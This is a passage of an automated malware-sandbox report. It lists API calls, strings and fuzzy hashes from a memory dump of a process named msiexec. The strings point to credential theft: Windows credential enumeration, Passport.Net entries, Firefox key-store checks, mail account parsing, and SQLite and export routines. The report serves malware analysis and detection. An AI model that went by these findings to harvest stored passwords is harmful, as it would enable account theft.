                                                                                                            • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 577244452-0
                                                                                                            • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                            • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                            • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                            • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                            • _strcmpi.MSVCRT ref: 00404518
                                                                                                            • _strcmpi.MSVCRT ref: 00404536
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _strcmpi$memcpystrlen
                                                                                                            • String ID: imap$pop3$smtp
                                                                                                            • API String ID: 2025310588-821077329
                                                                                                            • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                            • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                            • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                            • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040C02D
                                                                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                              • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                              • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                              • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                              • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                              • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                            • API String ID: 2726666094-3614832568
                                                                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                            • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00403A88
                                                                                                            • memset.MSVCRT ref: 00403AA1
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,?,?,?), ref: 00403AB8
                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                            • strlen.MSVCRT ref: 00403AE9
                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1786725549-0
                                                                                                            • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                            • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                            • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                            • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                            APIs
                                                                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmp$memcpy
                                                                                                            • String ID: global-salt$password-check
                                                                                                            • API String ID: 231171946-3927197501
                                                                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@
                                                                                                            • String ID:
                                                                                                            • API String ID: 613200358-0
                                                                                                            • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                            • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                            • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                            • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                            • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                            • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 19018683-0
                                                                                                            • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                            • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                            • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                            • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040644F
                                                                                                            • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                            • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                              • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 438689982-0
                                                                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0044495F
                                                                                                            • memset.MSVCRT ref: 00444978
                                                                                                            • memset.MSVCRT ref: 0044498C
                                                                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                            • strlen.MSVCRT ref: 004449A8
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                            • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                            • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset$strlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2142929671-0
                                                                                                            • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                            • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                            • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                            • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                              • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                              • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                            • strlen.MSVCRT ref: 0040F7BE
                                                                                                            • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                            • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                            • String ID: Passport.Net\*
                                                                                                            • API String ID: 2329438634-3671122194
                                                                                                            • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                            • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                            • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                            • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                            • memset.MSVCRT ref: 0040330B
                                                                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                            • strchr.MSVCRT ref: 0040335A
                                                                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                            • strlen.MSVCRT ref: 0040339C
                                                                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                            • String ID: Personalities
                                                                                                            • API String ID: 2103853322-4287407858
                                                                                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                            • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                            • API String ID: 3510742995-272990098
                                                                                                            • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                            • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                            • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                            • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: H
                                                                                                            • API String ID: 2221118986-2852464175
                                                                                                            • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                            • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                            • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                            • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy
                                                                                                            • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                            • API String ID: 3510742995-3170954634
                                                                                                            • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                            • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                            • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                            • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memset
                                                                                                            • String ID: winWrite1$winWrite2
                                                                                                            • API String ID: 438689982-3457389245
                                                                                                            • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                            • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                            • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                            • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: winRead
                                                                                                            • API String ID: 1297977491-2759563040
                                                                                                            • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                            • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                            • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                            • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0044955B
                                                                                                            • memset.MSVCRT ref: 0044956B
                                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset
                                                                                                            • String ID: gj
                                                                                                            • API String ID: 1297977491-4203073231
                                                                                                            • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                            • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                            • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                            • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                            APIs
                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1189762176-0
                                                                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                                            • String ID:
                                                                                                            • API String ID: 4247780290-0
                                                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                              • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
